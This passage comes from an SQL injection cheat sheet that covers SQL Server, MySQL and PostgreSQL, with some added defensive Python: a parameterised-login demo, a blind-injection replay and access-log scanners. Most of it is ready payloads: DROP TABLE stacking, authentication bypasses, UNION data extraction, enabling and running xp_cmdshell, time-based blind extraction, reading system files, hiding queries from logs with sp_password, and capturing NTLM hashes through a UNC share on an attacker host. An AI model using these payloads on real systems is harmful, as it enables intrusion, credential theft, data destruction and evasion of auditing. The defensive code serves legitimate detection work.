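    comments replaced by a space (UNION/**/SELECT -> UNION SELECT)."""
    out = []
    for repl in ("", " "):
        stripped = re.sub(r"/\*.*?\*/", repl, decoded, flags=re.S)
        out.append(re.sub(r"\s+", " ", stripped).lower())
    return out


def classify(raw_value):
    """Return the sorted indicator names found in one raw parameter value."""
    decoded = unquote_plus(raw_value)
    found = {name for name, rx in PRE_STRIP.items() if rx.search(decoded)}
    for variant in _variants(decoded):
        found.update(name for name, rx in POST_STRIP.items() if rx.search(variant))
    return sorted(found)


def scan_log(log_text):
    """Walk access-log lines; report each flagged parameter as
    (name, decoded value, indicators)."""
    hits = []
    for line in log_text.splitlines():
        m = re.search(r'"(?:GET|POST) (\S+) HTTP/', line)
        if not m:
            continue
        for pair in urlsplit(m.group(1)).query.split("&"):
            name, _, raw = pair.partition("=")
            indicators = classify(raw)
            if indicators:
                hits.append((name, unquote_plus(raw), indicators))
    return hits


# Constructed sample log (documentation-range IP, payloads from the text).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /news.php?id=10 HTTP/1.1" 200 512
203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /news.php?id=10%3B+DROP+TABLE+members+/* HTTP/1.1" 500 0
203.0.113.5 - - [10/Oct/2023:13:55:44 +0000] "GET /login.php?user=admin%27--&pass=x HTTP/1.1" 302 0
203.0.113.5 - - [10/Oct/2023:13:55:48 +0000] "GET /news.php?id=/*!32302+10*/ HTTP/1.1" 200 512
203.0.113.5 - - [10/Oct/2023:13:55:52 +0000] "GET /news.php?id=1%3B+DR%2F**%2FOP+TABLE+members HTTP/1.1" 500 0
203.0.113.5 - - [10/Oct/2023:13:55:56 +0000] "GET /login.php?user=%27+OR+%27%27%3D%27&pass=%27+OR+%27%27%3D%27 HTTP/1.1" 302 0
203.0.113.5 - - [10/Oct/2023:13:56:00 +0000] "GET /files.php?name=0x633A5C626F6F742E696E69 HTTP/1.1" 200 88
203.0.113.5 - - [10/Oct/2023:13:56:04 +0000] "GET /news.php?id=1+UNION%2F**%2FSELECT+login%2Cpassword+FROM+members HTTP/1.1" 200 900
"""

if __name__ == "__main__":
    for name, value, indicators in scan_log(SAMPLE_LOG):
        print(f"{name}={value!r}: {', '.join(indicators)}")
```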

    Stacking Queries

    Executing more than one query in one transaction. This is very useful at every injection point, especially in SQL Server back-ended applications.
    • ; (S)
      SELECT * FROM members; DROP members--
    Ends a query and starts a new one.

    Language / Database Stacked Query Support Table (green: supported, dark gray: not supported, light gray: unknown)
    [Table of stacked query support by language (ASP, ASP.NET, PHP, Java) and database (SQL Server, MySQL, PostgreSQL, ORACLE, MS Access); the colour-coded cells are not preserved in this text]
    About MySQL and PHP, to clarify some issues:
    PHP-MySQL doesn't support stacked queries; Java doesn't support stacked queries (I'm sure for ORACLE, not quite sure about other databases). Normally MySQL supports stacked queries, but because of the database layer in most configurations it's not possible to execute the second query in PHP-MySQL applications, or maybe the MySQL client supports this, not quite sure. Can someone clarify?
    Stacked SQL Injection Attack Samples
    • ID: 10;DROP members --
    • SELECT * FROM products WHERE id = 10; DROP members--
    This will run the DROP members SQL statement after the normal SQL query.

    If Statements

    Get a response based on an if statement. This is one of the key points of Blind SQL Injection; it can also be very useful to test simple stuff blindly and accurately.
    MySQL If Statement
    • IF(condition,true-part,false-part) (M)
      SELECT IF(1=1,'true','false')
    SQL Server If Statement
    • IF condition true-part ELSE false-part (S)
      IF (1=1) SELECT 'true' ELSE SELECT 'false'
    If Statement SQL Injection Attack Samples
    if ((select user) = 'sa' OR (select user) = 'dbo') select 1 else select 1/0 (S)
    This will throw a divide by zero error if the currently logged-in user is not "sa" or "dbo".

    Using Integers

    Very useful for bypassing magic_quotes() and similar filters, or even WAFs.
    • 0xHEXNUMBER (SM)
      You can write hex like this:

      SELECT CHAR(0x66) (S)
      SELECT 0x5045 (this is not an integer it will be a string from Hex) (M)
      SELECT 0x50 + 0x45 (this is integer now!) (M)

    String Operations

    String related operations. These can be quite useful to build up injections which do not use any quotes, to bypass other blacklisting, or to determine the back-end database.
    String Concatenation
    • + (S)
      SELECT login + '-' + password FROM members

    • || (*MO)
      SELECT login || '-' || password FROM members
    *About MySQL "||":
    If MySQL is running in ANSI mode it's going to work, but otherwise MySQL accepts it as a logical operator and it'll return 0. A better way to do it is using the CONCAT() function in MySQL.
    • CONCAT(str1, str2, str3, ...) (M)
      Concatenate supplied strings.
      SELECT CONCAT(login, password) FROM members

    Strings without Quotes

    These are some direct ways of using strings, but it's always possible to use CHAR() (MS) and CONCAT() (M) to generate strings without quotes.
    • 0x457578 (M) - Hex Representation of string
      SELECT 0x457578
      This will be selected as string in MySQL.

      In MySQL an easy way to generate the hex representation of a string is this:
      SELECT CONCAT('0x',HEX('c:\\boot.ini'))

    • Using CONCAT() in MySQL
      SELECT CONCAT(CHAR(75),CHAR(76),CHAR(77)) (M)
      This will return ‘KLM’.

    • SELECT CHAR(75)+CHAR(76)+CHAR(77) (S)
      This will return ‘KLM’.
    Hex based SQL Injection Samples
    • SELECT LOAD_FILE(0x633A5C626F6F742E696E69) (M)
      This will show the content of c:\boot.ini

    String Modification & Related

    • ASCII() (SMP)
      Returns the ASCII character value of the leftmost character. A must-have function for Blind SQL Injections.

      SELECT ASCII('a')

    • CHAR() (SM)
      Converts an integer to its ASCII character.

      SELECT CHAR(64)

    Union Injections

    With UNION you do SQL queries across tables. Basically you can poison the query to return records from another table.
    SELECT header, txt FROM news UNION ALL SELECT name, pass FROM members
    This will combine results from both the news table and the members table and return all of them. Another example:
    ' UNION SELECT 1, 'anotheruser', 'doesnt matter', 1--

    UNION – Fixing Language Issues

    While exploiting Union injections you sometimes get errors because of different language settings (table settings, field settings, combined table / db settings etc.); these functions are quite useful to fix this problem. It's rare, but if you are dealing with Japanese, Russian, Turkish etc. applications then you will see it.
    • SQL Server (S)
      Use field COLLATE SQL_Latin1_General_Cp1254_CS_AS or some other valid one - check out SQL Server documentation.

      SELECT header FROM news UNION ALL SELECT name COLLATE SQL_Latin1_General_Cp1254_CS_AS FROM members

    • MySQL (M)
      Hex() for every possible issue

    Bypassing Login Screens (SMO+)

    SQL Injection 101, Login tricks
    • admin' --
    • admin' #
    • admin'/*
    • ' or 1=1--
    • ' or 1=1#
    • ' or 1=1/*
    • ') or '1'='1--
    • ') or ('1'='1--
    • ....
    • Login as different user (SM*)
      ' UNION SELECT 1, 'anotheruser', 'doesnt matter', 1--
    *Old versions of MySQL don't support UNION queries

    Bypassing second MD5 hash check login screens

    If the application first fetches the record by username and then compares the returned MD5 with the MD5 of the supplied password, you need some extra tricks to bypass authentication. You can UNION the result with a known username and the MD5 hash of the password you are going to supply; the application then compares your password against the hash you injected instead of the hash from the database.

    Bypassing MD5 Hash Check Example (MSP)
    Username : admin' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
    Password : 1234
    81dc9bdb52d04dc20036dbd8313ed055 = MD5(1234)
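The two login patterns above, side by side with the fix, as an added example that is not part of the cheat sheet: a vulnerable lookup that concatenates the username and then checks MD5(password) against whatever row came back, and a parameterised lookup that binds the username as data. The SQLite table, the user and the stored password are constructed for the demonstration.

```python
"""Vulnerable vs. hardened login check, run against an in-memory SQLite
database. Added example, not from the cheat sheet: the members table, its
single user and the password are constructed for the demonstration."""
import hashlib
import hmac
import sqlite3


def md5_hex(text: str) -> str:
    return hashlib.md5(text.encode()).hexdigest()


def make_db() -> sqlite3.Connection:
    # Constructed sample data: one administrator whose password the attacker
    # does not know. Unsalted MD5 storage is itself weak; it mirrors the page.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE members (id INTEGER, name TEXT, pass TEXT)")
    conn.execute("INSERT INTO members VALUES (1, 'admin', ?)",
                 (md5_hex("s3cret-not-1234"),))
    return conn


def login_vulnerable(conn, username, password):
    """The 'second MD5 hash check' pattern: fetch the row by a concatenated
    username, then compare MD5(password) with whatever 'pass' came back."""
    sql = f"SELECT name, pass FROM members WHERE name = '{username}'"
    row = conn.execute(sql).fetchone()
    if row is None:
        return None
    return row[0] if row[1] == md5_hex(password) else None


def login_hardened(conn, username, password):
    """Parameterised lookup: the username is bound as data, so a quote,
    comment or UNION inside it cannot alter the statement. The constant-time
    compare is unrelated to injection but costs nothing."""
    row = conn.execute("SELECT name, pass FROM members WHERE name = ?",
                       (username,)).fetchone()
    if row is None:
        return None
    return row[0] if hmac.compare_digest(row[1], md5_hex(password)) else None


def demo():
    conn = make_db()
    # Login trick from the list above: '--' comments out the closing quote.
    comment_user = "admin' --"
    # Payload from the MD5 example: the UNION row carries MD5('1234'), so the
    # application ends up comparing the attacker's hash with itself.
    union_user = ("admin' AND 1=0 UNION ALL SELECT 'admin', '"
                  + md5_hex("1234") + "' --")
    return {
        # The comment alone returns the real row, so the hash check still fails.
        "vuln_comment": login_vulnerable(conn, comment_user, "anything"),
        "vuln_union": login_vulnerable(conn, union_user, "1234"),
        "hard_union": login_hardened(conn, union_user, "1234"),
        "hard_real": login_hardened(conn, "admin", "s3cret-not-1234"),
    }


if __name__ == "__main__":
    print(demo())
```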

    Error Based - Find Columns Names

    Finding Column Names with HAVING BY - Error Based (S)
    In the same order:
    • ' HAVING 1=1 --
    • ' GROUP BY table.columnfromerror1 HAVING 1=1 --
    • ' GROUP BY table.columnfromerror1, columnfromerror2 HAVING 1=1 --
    • ' GROUP BY table.columnfromerror1, columnfromerror2, columnfromerror(n) HAVING 1=1 -- and so on
    • When you no longer get an error, you have all the column names.

    Finding how many columns are in the SELECT query by ORDER BY (MSO+)
    Finding the column count with ORDER BY can speed up the UNION SQL injection process.
    • ORDER BY 1--
    • ORDER BY 2--
    • ORDER BY N-- and so on
    • Keep going until you get an error; the error means you have gone past the number of selected columns.

    Data types, UNION, etc.

    Hints,
    • Always use UNION with ALL because of image and similar non-comparable field types. By default UNION tries to return distinct records.
    • To get rid of unwanted records from the left table, use -1 or a search for any non-existent record at the beginning of the query (if the injection is in WHERE). This can be critical if you are only getting one result at a time.
    • Use NULL in UNION injections for most data types instead of trying to guess string, date, integer etc.
      • Be careful in blind situations: you may not be able to tell whether the error comes from the DB or from the application itself, because languages like ASP.NET generally throw errors when trying to use NULL values (normally developers are not expecting to see NULL in a username field).
    Finding Column Type
    • ' union select sum(columntofind) from users-- (S)
      Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
      [Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average aggregate operation cannot take a varchar data type as an argument.

      If you don't get an error, the column is numeric.

    • Also you can use CAST() or CONVERT()
      • SELECT * FROM Table1 WHERE id = -1 UNION ALL SELECT null, null, NULL, NULL, convert(image,1), null, null,NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL--

      Microsoft OLE DB Provider for SQL Server error '80040e07'
      Explicit conversion from data type int to image is not allowed.

    • 11223344) UNION SELECT NULL,NULL,NULL,NULL WHERE 1=2 --
      No Error - Syntax is right. MS SQL Server Used. Proceeding.

    • 11223344) UNION SELECT 1,NULL,NULL,NULL WHERE 1=2 --
      No Error - First column is an integer.

    • 11223344) UNION SELECT 1,2,NULL,NULL WHERE 1=2 --
      Error! - Second column is not an integer.

    • 11223344) UNION SELECT 1,'2',NULL,NULL WHERE 1=2 --
      No Error - Second column is a string.

    • 11223344) UNION SELECT 1,'2',3,NULL WHERE 1=2 --
      Error! - Third column is not an integer. ...

    You'll get convert() errors before UNION target errors! So start with convert(), then UNION.

    Simple Insert (MSO+)

    '; insert into users values( 1, 'hax0r', 'coolpass', 9 )/*

    Useful Function / Information Gathering / Stored Procedures / Bulk SQL Injection Notes

    @@version (MS)
    Version of the database and more details for SQL Server. It's a constant. You can just select it like any other column; you don't need to supply a table name. You can also use it in insert and update statements or in functions.
    INSERT INTO members(id, user, pass) VALUES(1, ''+SUBSTRING(@@version,1,10) ,10)

    Bulk Insert (S)
    Insert a file's content into a table. If you don't know the internal path of the web application you can read the IIS (IIS 6 only) metabase file (%systemroot%\system32\inetsrv\MetaBase.xml) and then search in it to identify the application path.
      1. Create table foo( line varchar(8000) )
      2. bulk insert foo from 'c:\inetpub\wwwroot\login.asp'
      3. Drop temp table, and repeat for another file.

    BCP (S)
    Write a text file. Login credentials are required to use this function.
    bcp "SELECT * FROM test..foo" queryout c:\inetpub\wwwroot\runcommand.asp -c -Slocalhost -Usa -Pfoobar

    VBS, WSH in SQL Server (S)
    You can use VBS, WSH scripting in SQL Server because of ActiveX support.
    declare @o int
    exec sp_oacreate 'wscript.shell', @o out
    exec sp_oamethod @o, 'run', NULL, 'notepad.exe'
    Username: '; declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL, 'notepad.exe' --

    Executing system commands, xp_cmdshell (S)
    Well known trick. By default it's disabled in SQL Server 2005. You need to have admin access.
    EXEC master.dbo.xp_cmdshell 'cmd.exe dir c:'
    Simple ping check (configure your firewall or sniffer to identify the request before launching it):
    EXEC master.dbo.xp_cmdshell 'ping '
    You can not read the results directly from an error, a UNION or anything else.

    Some Special Tables in SQL Server (S)
    • Error Messages
      master..sysmessages

    • Linked Servers
      master..sysservers

    • Password (2000 and 2005 both can be cracked; they use very similar hashing algorithms)
      SQL Server 2000: master..sysxlogins
      SQL Server 2005 : sys.sql_logins
    More Stored Procedures for SQL Server (S)
    1. Cmd Execute (xp_cmdshell)
      exec master..xp_cmdshell 'dir'

    2. Registry Stuff (xp_regread)
      1. xp_regaddmultistring
      2. xp_regdeletekey
      3. xp_regdeletevalue
      4. xp_regenumkeys
      5. xp_regenumvalues
      6. xp_regread
      7. xp_regremovemultistring
      8. xp_regwrite
        exec xp_regread HKEY_LOCAL_MACHINE, 'SYSTEM\CurrentControlSet\Services\lanmanserver\parameters', 'nullsessionshares'
        exec xp_regenumvalues HKEY_LOCAL_MACHINE, 'SYSTEM\CurrentControlSet\Services\snmp\parameters\validcommunities'

    3. Managing Services (xp_servicecontrol)
    4. Medias (xp_availablemedia)
    5. ODBC Resources (xp_enumdsn)
    6. Login mode (xp_loginconfig)
    7. Creating Cab Files (xp_makecab)
    8. Domain Enumeration (xp_ntsec_enumdomains)
    9. Process Killing (need PID) (xp_terminate_process)
    10. Add new procedure (virtually you can execute whatever you want)
      sp_addextendedproc 'xp_webserver', 'c:\temp\x.dll'
      exec xp_webserver
    11. Write text file to a UNC or an internal path (sp_makewebtask)
    MSSQL Bulk Notes
    SELECT * FROM master..sysprocesses /*WHERE spid=@@SPID*/
    DECLARE @result int; EXEC @result = xp_cmdshell 'dir *.exe';IF (@result = 0) SELECT 0 ELSE SELECT 1/0
    HOST_NAME()
    IS_MEMBER (Transact-SQL)
    IS_SRVROLEMEMBER (Transact-SQL)
    OPENDATASOURCE (Transact-SQL)
    INSERT tbl EXEC master..xp_cmdshell OSQL /Q"DBCC SHOWCONTIG"
    OPENROWSET (Transact-SQL) - http://msdn2.microsoft.com/en-us/library/ms190312.aspx
    You can not use sub selects in SQL Server INSERT queries.

    SQL Injection in LIMIT (M) or ORDER (MSO)
    SELECT id, product FROM test.test t LIMIT 0,0 UNION ALL SELECT 1,'x'/*,10 ;
    If the injection is in the second LIMIT argument you can comment it out or use it in your UNION injection.

    Shutdown SQL Server (S)
    When you are really pissed off, ';shutdown --

    Enabling xp_cmdshell in SQL Server 2005

    By default xp_cmdshell and a couple of other potentially dangerous stored procedures are disabled in SQL Server 2005. If you have admin access then you can enable these.
    EXEC sp_configure 'show advanced options',1
    RECONFIGURE
    EXEC sp_configure 'xp_cmdshell',1
    RECONFIGURE

    Finding Database Structure in SQL Server (S)

    Getting User defined Tables
    SELECT name FROM sysobjects WHERE xtype = 'U'

    Getting Column Names
    SELECT name FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name = 'tablenameforcolumnnames')

    Moving records (S)

    • Modify WHERE and use NOT IN or NOT EXISTS,
      ... WHERE users NOT IN ('First User', 'Second User')
      SELECT TOP 1 name FROM members WHERE NOT EXISTS(SELECT TOP 0 name FROM members) -- very good one

    • Using Dirty Tricks
      SELECT * FROM Product WHERE ID=2 AND 1=CAST((Select p.name from (SELECT (SELECT COUNT(i.id) AS rid FROM sysobjects i WHERE i.id<=o.id) AS x, name from sysobjects o) as p where p.x=3) as int)
      Select p.name from (SELECT (SELECT COUNT(i.id) AS rid FROM sysobjects i WHERE xtype='U' and i.id<=o.id) AS x, name from sysobjects o WHERE o.xtype = 'U') as p where p.x=21

    Fast way to extract data from Error Based SQL Injections in SQL Server (S)

    ';BEGIN DECLARE @rd varchar(8000) SET @rd=':' SELECT @rd=@rd+' '+name FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name = 'MEMBERS') AND name>@rd SELECT @rd AS rd into TMP_SYS_TMP end;--

    Blind SQL Injections

    About Blind SQL Injections

    In a reasonably good production application you generally can not see error responses on the page, so you can not extract data through UNION attacks or error based attacks. You have to use blind SQL injection attacks to extract data. There are two kinds of blind SQL injection.

    Normal Blind: you can not see a response in the page, but you can still determine the result of a query from the response or the HTTP status code.
    Totally Blind: you can not see any difference in the output at all. This can be an injection into a logging function or similar. Not so common though.

    In normal blinds you can use IF statements or abuse the WHERE clause of the query (generally easier); in totally blinds you need to use some waiting functions and analyze response times. For this you can use WAIT FOR DELAY '0:0:10' in SQL Server, BENCHMARK() in MySQL, pg_sleep(10) in PostgreSQL, and some PL/SQL tricks in Oracle.

    Real and a bit Complex Blind SQL Injection Attack Sample

    This output was taken from a real private blind SQL injection tool while exploiting a SQL Server backed application and enumerating table names. These requests were made for the first character of the first table name. The SQL queries are a bit more complex than required because of automation reasons. Here we are trying to determine the ASCII value of a character via a binary search algorithm. TRUE and FALSE flags mark queries that returned true or false.

    TRUE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>78--

    FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>103--

    TRUE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)<103--

    FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>89--

    TRUE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)<89--

    FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>83--

    TRUE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)<83--

    FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>80--

    FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)<80--
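Replaying the transcript above shows what each TRUE/FALSE answer buys the attacker, and why a defender sees a burst of near-identical requests that differ only in the threshold number. This is an added example, not the tool's code; TRANSCRIPT is read off the nine queries on this page (operator, threshold, whether the page marks it TRUE), and the function names are mine.

```python
"""Replay the TRUE/FALSE transcript above and show how each boolean answer
narrows the candidate ASCII range of the character being extracted. Added
example, not the tool's own code; TRANSCRIPT is read off the nine queries
shown on this page (operator, threshold, whether the page marks it TRUE)."""
import math

TRANSCRIPT = [
    (">", 78, True), (">", 103, False), ("<", 103, True),
    (">", 89, False), ("<", 89, True), (">", 83, False),
    ("<", 83, True), (">", 80, False), ("<", 80, False),
]


def narrow(lo, hi, op, threshold, answer):
    """Apply one oracle answer to the closed interval [lo, hi].
    ISNULL(ASCII(...),0) > t being TRUE means the value is at least t+1;
    FALSE means it is at most t. The '<' case mirrors this."""
    if op == ">":
        return (max(lo, threshold + 1), hi) if answer else (lo, min(hi, threshold))
    if op == "<":
        return (lo, min(hi, threshold - 1)) if answer else (max(lo, threshold), hi)
    raise ValueError(f"unknown operator {op!r}")


def replay(transcript, lo=0, hi=127):
    """Return the final interval plus the interval after every step."""
    history = []
    for op, threshold, answer in transcript:
        lo, hi = narrow(lo, hi, op, threshold, answer)
        history.append((op, threshold, answer, lo, hi))
    return lo, hi, history


def recovered_char(transcript):
    """The extracted character once the interval has collapsed to one value."""
    lo, hi, _ = replay(transcript)
    return chr(lo) if lo == hi else None


def minimum_queries(lo=0, hi=127):
    """A pure binary search over [lo, hi] needs this many yes/no answers; the
    transcript uses nine because the tool re-checks with '<' after each '>'."""
    return math.ceil(math.log2(hi - lo + 1))


if __name__ == "__main__":
    for step in replay(TRANSCRIPT)[2]:
        print("%s%3d -> %-5s  candidates now [%d, %d]" % step)
    print("first character of the first table name:", recovered_char(TRANSCRIPT))
```

The nine answers collapse the range to a single value, 80 ('P'); one character per seven to nine requests is the rate a request log will show during this kind of extraction.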

    Waiting For Blind SQL Injections

    First of all, use this only if it's really blind; otherwise just use 1/0 style errors to identify the difference. Second, be careful when using times of more than 20-30 seconds: the database API connection or the script can time out.

    WAIT FOR DELAY 'time' (S)
    This is just like sleep: wait for the specified time. A CPU-safe way to make the database wait.
    WAITFOR DELAY '0:0:10'--
    Also you can use fractions like this,
    WAITFOR DELAY '0:0:0.51'

    Real World Samples
    • Are we 'sa' ?
      if (select user) = 'sa' waitfor delay '0:0:10'
    • ProductID = 1;waitfor delay '0:0:10'--
    • ProductID =1);waitfor delay '0:0:10'--
    • ProductID =1';waitfor delay '0:0:10'--
    • ProductID =1');waitfor delay '0:0:10'--
    • ProductID =1));waitfor delay '0:0:10'--
    • ProductID =1'));waitfor delay '0:0:10'--

    BENCHMARK() (M)
    Basically we are abusing this command to make MySQL wait a bit. Be careful, you will consume the web server's limit very fast!
    BENCHMARK(howmanytimes, do this)

    Real World Samples
    • Are we root ? woot!
      IF EXISTS (SELECT * FROM users WHERE username = 'root') BENCHMARK(1000000000,MD5(1))

    • Check Table exist in MySQL
      IF (SELECT * FROM login) BENCHMARK(1000000,MD5(1))

    pg_sleep(seconds) (P)
    Sleeps for the supplied number of seconds.
    • SELECT pg_sleep(10);
      Sleep 10 seconds.

    Covering Tracks

    SQL Server - sp_password log bypass (S)
    SQL Server doesn't log queries which include sp_password, for security reasons(!). So if you add --sp_password to your queries it will not be in the SQL Server logs (of course it will still be in the web server logs; try to use POST if possible).

    Clear SQL Injection Tests

    These tests are simply good for blind SQL injection and silent attacks.
    1. product.asp?id=4 (SMO)
      1. product.asp?id=5-1
      2. product.asp?id=4 OR 1=1

    2. product.asp?name=Book
      1. product.asp?name=Bo'%2b'ok
      2. product.asp?name=Bo' || 'ok (OM)
      3. product.asp?name=Book' OR 'x'='x
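The "Covering Tracks" note says the --sp_password trick still leaves the request in the web server log, and the tests above are designed to look harmless. The scanner below is an added example, not part of the cheat sheet: it normalises the query string the way the sheet's obfuscations require (URL encoding, '+' for space, empty /**/ comments, mixed case) and flags the payload shapes this page shows. LOG_LINES are constructed Apache-style lines; the indicator names and regexes are mine.

```python
"""Flag SQL-injection indicators in web-server access-log lines. Added
example, not from the cheat sheet: LOG_LINES are constructed, and the
pattern list is built from the payload shapes this page shows."""
import re
from urllib.parse import unquote_plus

# Name and regex for each indicator, matched against the normalised query string.
INDICATORS = [
    ("comment-terminator", re.compile(r"(--|#|/\*)\s*$")),
    ("tautology", re.compile(r"\bor\s*\(?\s*['\"]?\w+['\"]?\s*=\s*['\"]?\w+")),
    ("union-select", re.compile(r"\bunion\s*(all\s*)?select\b")),
    ("time-delay", re.compile(r"\b(waitfor\s+delay|benchmark\s*\(|pg_sleep\s*\()")),
    ("sqlserver-procs", re.compile(r"\b(xp_cmdshell|sp_oacreate|sp_password|xp_reg\w+)\b")),
    ("mysql-file", re.compile(r"\b(load_file\s*\(|into\s+(out|dump)file\b)")),
    ("hex-literal", re.compile(r"\b0x[0-9a-f]{4,}\b")),
]

# Apache/IIS style request line: method, path and optional query string.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>[^?\s]+)(?:\?(?P<qs>\S*))? HTTP')

# Constructed sample log; requests 2 to 5 carry payloads shown on this page.
LOG_LINES = [
    '10.0.0.5 - - [01/Feb/2007:10:00:01 +0100] "GET /product.asp?id=4 HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Feb/2007:10:00:02 +0100] "GET /product.asp?id=4%20OR%201=1 HTTP/1.1" 200 9812',
    '10.0.0.5 - - [01/Feb/2007:10:00:03 +0100] "GET /product.asp?id=1;waitfor%20delay%20%270:0:10%27-- HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Feb/2007:10:00:04 +0100] "GET /query.php?user=1+union+select+load_file(0x633A5C626F6F742E696E69),1,1 HTTP/1.1" 200 2048',
    '10.0.0.5 - - [01/Feb/2007:10:00:05 +0100] "GET /login.asp?user=admin%27--sp_password HTTP/1.1" 302 0',
    '10.0.0.9 - - [01/Feb/2007:10:00:06 +0100] "GET /product.asp?name=Book HTTP/1.1" 200 700',
]


def normalise(query):
    """Undo the obfuscations the sheet lists: URL encoding, '+' for space,
    empty /**/ comments used to split keywords, other comments, mixed case."""
    text = unquote_plus(query)
    text = text.replace("/**/", "")                # WHE/**/RE -> WHERE
    text = re.sub(r"/\*.*?\*/", " ", text)         # other comments -> space
    return re.sub(r"\s+", " ", text).strip().lower()


def scan(lines):
    """Return [(line_number, [indicator names])] for every line with a hit."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match or not match.group("qs"):
            continue
        text = normalise(match.group("qs"))
        found = [name for name, rx in INDICATORS if rx.search(text)]
        if found:
            hits.append((number, found))
    return hits


if __name__ == "__main__":
    for number, found in scan(LOG_LINES):
        print(f"line {number}: {', '.join(found)}")
```

The arithmetic test id=5-1 is deliberately not in the list: it is indistinguishable from a legitimate value in the log alone and has to be caught by comparing the response to id=4 instead.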

    Some Extra MySQL Notes

    • Subqueries only work in MySQL 4.1+
    • Users
      • SELECT User,Password FROM mysql.user;
    • SELECT 1,1 UNION SELECT IF(SUBSTRING(Password,1,1)='2',BENCHMARK(100000,SHA1(1)),0) User,Password FROM mysql.user WHERE User = 'root';
    • SELECT ... INTO DUMPFILE
      • Write query into a new file (can not modify existing files)
    • UDF Function
      • create function LockWorkStation returns integer soname 'user32';
      • select LockWorkStation();
      • create function ExitProcess returns integer soname 'kernel32';
      • select exitprocess();
    • SELECT USER();
    • SELECT password,USER() FROM mysql.user;
    • First byte of admin hash
      • SELECT SUBSTRING(user_password,1,1) FROM mb_users WHERE user_group = 1;
    • Read File
      • query.php?user=1+union+select+load_file(0x63...),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1
    • MySQL Load Data inifile
      • By default it's not available!
        • create table foo( line blob );
          load data infile 'c:/boot.ini' into table foo;
          select * from foo;
    • More Timing in MySQL
    • select benchmark( 500000, sha1( 'test' ) );
    • query.php?user=1+union+select+benchmark(500000,sha1 (0x414141)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1
    • select if( user() like 'root@%', benchmark(100000,sha1('test')), 'false' );
      Enumeration data, Guessed Brute Force
      • select if( (ascii(substring(user(),1,1)) >> 7) & 1, benchmark(100000,sha1('test')), 'false' );
    Potentially Useful MySQL Functions
    • MD5()
      MD5 Hashing
    • SHA1()
      SHA1 Hashing

    • PASSWORD()
    • ENCODE()
    • COMPRESS()
      Compress data, can be great in large binary reading in Blind SQL Injections.
    • ROW_COUNT()
    • SCHEMA()
    • VERSION()
      Same as @@version

    Second Order SQL Injections

    Basically you put an SQL injection into one place and expect it to be used unfiltered in another action. This is a common hidden layer problem.
    Name : ' + (SELECT TOP 1 password FROM users ) + '
    Email : xx@xx.com
    If the application uses the name field in an unsafe stored procedure, function, process etc., then it will insert the first user's password as your name etc.

    Forcing SQL Server to get NTLM Hashes

    This attack can help you to get the Windows password (NTLM hash) of the SQL Server user on the target server, but your inbound connection will possibly be firewalled. It can be very useful in internal penetration tests. We force SQL Server to connect to our Windows UNC share and capture the NTLM session data with a tool like Cain & Abel.

    Bulk insert from a UNC Share (S)
    bulk insert foo from '\\YOURIPADDRESS\C$\x.txt'

    Basics.

    SELECT * FROM login /* foobar */
    SELECT * FROM login WHERE id = 1 or 1=1
    SELECT * FROM login WHERE id = 1 or 1=1 AND user LIKE "%root%"
    Variations.

